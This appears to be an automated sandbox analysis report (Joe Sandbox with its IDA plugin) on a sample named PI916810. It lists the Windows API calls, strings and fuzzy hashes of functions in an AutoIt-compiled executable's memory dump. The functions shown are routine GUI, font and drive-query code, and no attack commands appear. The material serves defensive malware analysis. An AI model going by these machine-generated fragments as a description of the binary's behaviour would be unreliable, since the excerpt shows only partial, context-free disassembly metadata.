                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4124339563-0
                                                                                                                                                                            • Opcode ID: 22c92b85a1a4b572abfe165f4af4b5c57446a0758f9a3ce7f3118f67fc9b8124
                                                                                                                                                                            • Instruction ID: c617a6fc996bffb360233d7c9cd89ec3c6fcd66dca7c7d17e7b2691d88e2af27
                                                                                                                                                                            • Opcode Fuzzy Hash: 22c92b85a1a4b572abfe165f4af4b5c57446a0758f9a3ce7f3118f67fc9b8124
                                                                                                                                                                            • Instruction Fuzzy Hash: E9A1A371008341FFD7109F65DC48A6BBBA9FF88321F104A3AF5529A1E2D734E949CB56
                                                                                                                                                                            Function 00462C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?), ref: 00462CA2
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00462CE8
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00462CF3
                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00462CFE
                                                                                                                                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00462D09
                                                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0049C68B
                                                                                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0049C6C4
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0049CAED
                                                                                                                                                                              • Part of subcall function 00461B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00462036,?,00000000,?,?,?,?,004616CB,00000000,?), ref: 00461B9A
                                                                                                                                                                            • SendMessageW.USER32(?,00001053), ref: 0049CB2A
                                                                                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0049CB41
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0049CB57
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0049CB62
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 464785882-4108050209
                                                                                                                                                                            • Opcode ID: 704cdbedd17e0834f11250c7df0696709c6c43d3d43b7987c3ead34ec19bcc51
                                                                                                                                                                            • Instruction ID: 34bbb3a462849fb93f72efed81554d5c270792342b8c91bdd262bb7779963981
                                                                                                                                                                            • Opcode Fuzzy Hash: 704cdbedd17e0834f11250c7df0696709c6c43d3d43b7987c3ead34ec19bcc51
                                                                                                                                                                            • Instruction Fuzzy Hash: 5712BE30600641EFCB20CF24C9C4BAABBE1BF45310F54457AE985DB262D779EC42CB9A
                                                                                                                                                                            Function 004D77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 004D77F1
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004D78B0
                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004D78EE
                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004D7900
                                                                                                                                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 004D7946
                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004D7952
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 004D7996
                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004D79A5
                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004D79B5
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004D79B9
                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004D79C9
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D79D2
                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004D79DB
                                                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004D7A07
                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 004D7A1E
                                                                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 004D7A59
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 004D7A6D
                                                                                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 004D7A7E
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 004D7AAE
                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004D7AB9
                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004D7AC4
                                                                                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004D7ACE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                            • API String ID: 2910397461-517079104
                                                                                                                                                                            • Opcode ID: e29192e701c58d3ede65739b85c0432eeadfa5d3650eb703492265be303d6036
                                                                                                                                                                            • Instruction ID: 000f423c775e8a839230909b83e0ace8670d750a7ea0a8553c4aefb358ad75fa
                                                                                                                                                                            • Opcode Fuzzy Hash: e29192e701c58d3ede65739b85c0432eeadfa5d3650eb703492265be303d6036
                                                                                                                                                                            • Instruction Fuzzy Hash: 37A192B1A00205BFEB10DBA4DC8AFAE7BB9EF45714F104119FA14AB2E1D774AD05CB64
                                                                                                                                                                            Function 004CAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 004CAF89
                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,004EFAC0,?,\\.\,004EF910), ref: 004CB066
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,004EFAC0,?,\\.\,004EF910), ref: 004CB1C4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                            • API String ID: 2907320926-4222207086
                                                                                                                                                                            • Opcode ID: 3d57503595177abf29b03373f08973bda87f0727883fa7e6acdb8647842a366d
                                                                                                                                                                            • Instruction ID: de300652327e8b3404d0a2899131eb0a630ffb8768e9ecabb119a70b34f3feb6
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d57503595177abf29b03373f08973bda87f0727883fa7e6acdb8647842a366d
                                                                                                                                                                            • Instruction Fuzzy Hash: FF51C638A813459B9B41DB11C953EBD77B0FB54386F28401FE406A7291DB7D9E82C78B
                                                                                                                                                                            Function 00466A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wcsnicmp
                                                                                                                                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                            • API String ID: 1038674560-86951937
                                                                                                                                                                            • Opcode ID: ddb223c9f8a87c1289f17a6bf7c9adcc721b05489f7a35ea770b84ce8a4dd3ec
                                                                                                                                                                            • Instruction ID: a55cdbdf07bb251a2c01a976bdee9437f72b3bd4778d9b9f1d6c2f85d65fdef5
                                                                                                                                                                            • Opcode Fuzzy Hash: ddb223c9f8a87c1289f17a6bf7c9adcc721b05489f7a35ea770b84ce8a4dd3ec
                                                                                                                                                                            • Instruction Fuzzy Hash: BA811B70640215EACB14FF62CD92FAF7B58AF11704F04402BF945AA282FB6CEA45C65F
                                                                                                                                                                            Function 004EAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 004EAB99
                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 004EAB9D
                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004EABB3
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 004EABBE
                                                                                                                                                                            • CreateSolidBrush.GDI32(?), ref: 004EABC3
                                                                                                                                                                            • GetSysColor.USER32(00000011), ref: 004EABDB
                                                                                                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 004EABE9
                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 004EABFA
                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 004EAC03
                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 004EAC10
                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004EAC2F
                                                                                                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004EAC46
                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 004EAC5B
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004EACA7
                                                                                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 004EACCE
                                                                                                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 004EACEC
                                                                                                                                                                            • DrawFocusRect.USER32(?,?), ref: 004EACF7
                                                                                                                                                                            • GetSysColor.USER32(00000011), ref: 004EAD05
                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004EAD0D
                                                                                                                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004EAD21
                                                                                                                                                                            • SelectObject.GDI32(?,004EA869), ref: 004EAD38
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004EAD43
                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 004EAD49
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004EAD4E
                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 004EAD54
                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 004EAD5E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1996641542-0
                                                                                                                                                                            • Opcode ID: 71aeadd0158b44d7e8e86b167174f00e576aa8dba86708eb3a83180cf1c2edd4
                                                                                                                                                                            • Instruction ID: 51ff0e1a01cfbbf081207a3abe46e8077aa4027dd515349821deae30f1b3c4ad
                                                                                                                                                                            • Opcode Fuzzy Hash: 71aeadd0158b44d7e8e86b167174f00e576aa8dba86708eb3a83180cf1c2edd4
                                                                                                                                                                            • Instruction Fuzzy Hash: 72618171900248FFDF109FA5DC88EAEBB79EB08321F104126F911AB2A2D675AD40DB94
                                                                                                                                                                            Function 004E8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 004E8D34
                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004E8D45
                                                                                                                                                                            • CharNextW.USER32(0000014E), ref: 004E8D74
                                                                                                                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 004E8DB5
                                                                                                                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 004E8DCB
                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004E8DDC
                                                                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 004E8DF9
                                                                                                                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 004E8E45
                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 004E8E5B
                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 004E8E8C
                                                                                                                                                                            • _memset.LIBCMT ref: 004E8EB1
                                                                                                                                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 004E8EFA
                                                                                                                                                                            • _memset.LIBCMT ref: 004E8F59
                                                                                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 004E8F83
                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 004E8FDB
                                                                                                                                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 004E9088
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004E90AA
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004E90F4
                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004E9121
                                                                                                                                                                            • DrawMenuBar.USER32(?), ref: 004E9130
                                                                                                                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 004E9158
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 1073566785-4108050209
                                                                                                                                                                            • Opcode ID: ebacc501cf2920c7e8a23c87a9fa185e085c08743ea8c6483ec9b0194bda6567
                                                                                                                                                                            • Instruction ID: dce6b0ef0d90e3afe0d2f7513faf59938169285134b38a1bdccbe6fc50b1a9a8
                                                                                                                                                                            • Opcode Fuzzy Hash: ebacc501cf2920c7e8a23c87a9fa185e085c08743ea8c6483ec9b0194bda6567
                                                                                                                                                                            • Instruction Fuzzy Hash: D4E1E570900289ABDF20DF62CC84EEF7B78EF05715F10415BF9199A291DB788A46CF69
                                                                                                                                                                            Function 004E4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004E4C51
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004E4C66
                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004E4C6D
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004E4CCF
                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 004E4CFB
                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004E4D24
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004E4D42
                                                                                                                                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004E4D68
                                                                                                                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004E4D7D
                                                                                                                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004E4D90
                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 004E4DB0
                                                                                                                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 004E4DCB
                                                                                                                                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 004E4DDF
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004E4DF7
                                                                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 004E4E1D
                                                                                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 004E4E37
                                                                                                                                                                            • CopyRect.USER32(?,?), ref: 004E4E4E
                                                                                                                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 004E4EB9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                                                                                            • API String ID: 698492251-4156429822
                                                                                                                                                                            • Opcode ID: dc98ceb05fc526acecf58e82b8d80d074f35f2746e5e93cc00e8f91e22029f1d
                                                                                                                                                                            • Instruction ID: aa161ab30ba9088d236f9bf39792fb2c0273624bd5f07bbae8243b4dd2ba11ed
                                                                                                                                                                            • Opcode Fuzzy Hash: dc98ceb05fc526acecf58e82b8d80d074f35f2746e5e93cc00e8f91e22029f1d
                                                                                                                                                                            • Instruction Fuzzy Hash: A9B17D71604380AFDB04DF66C984B6BBBE4BF84314F00892EF5999B2A1D775EC05CB5A
                                                                                                                                                                            Function 004C46D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004C46E8
                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004C470E
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004C473C
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004C4747
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004C475D
                                                                                                                                                                            • _wcsstr.LIBCMT ref: 004C4768
                                                                                                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004C4784
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004C47CD
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004C47D4
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 004C47FF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                            • API String ID: 699586101-1459072770
                                                                                                                                                                            • Opcode ID: 2a9310a0a9805bd495a013bf0e7984e28dedb4a72cedbc0a1cd7e9f8aead4d24
                                                                                                                                                                            • Instruction ID: 99b197aa4be24b9beccfb7e91e7f6a47c107933ce1780fab74f025b52910d46a
                                                                                                                                                                            • Opcode Fuzzy Hash: 2a9310a0a9805bd495a013bf0e7984e28dedb4a72cedbc0a1cd7e9f8aead4d24
                                                                                                                                                                            • Instruction Fuzzy Hash: D341F579A002107AE711BA668D42FBF776CEF81710F10446FFA05A6182EB7C9A0197BD
                                                                                                                                                                            Function 004627D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004628BC
                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 004628C4
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004628EF
                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 004628F7
                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 0046291C
                                                                                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00462939
                                                                                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00462949
                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0046297C
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00462990
                                                                                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 004629AE
                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004629CA
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 004629D5
                                                                                                                                                                              • Part of subcall function 00462344: GetCursorPos.USER32(?), ref: 00462357
                                                                                                                                                                              • Part of subcall function 00462344: ScreenToClient.USER32(005267B0,?), ref: 00462374
                                                                                                                                                                              • Part of subcall function 00462344: GetAsyncKeyState.USER32(00000001), ref: 00462399
                                                                                                                                                                              • Part of subcall function 00462344: GetAsyncKeyState.USER32(00000002), ref: 004623A7
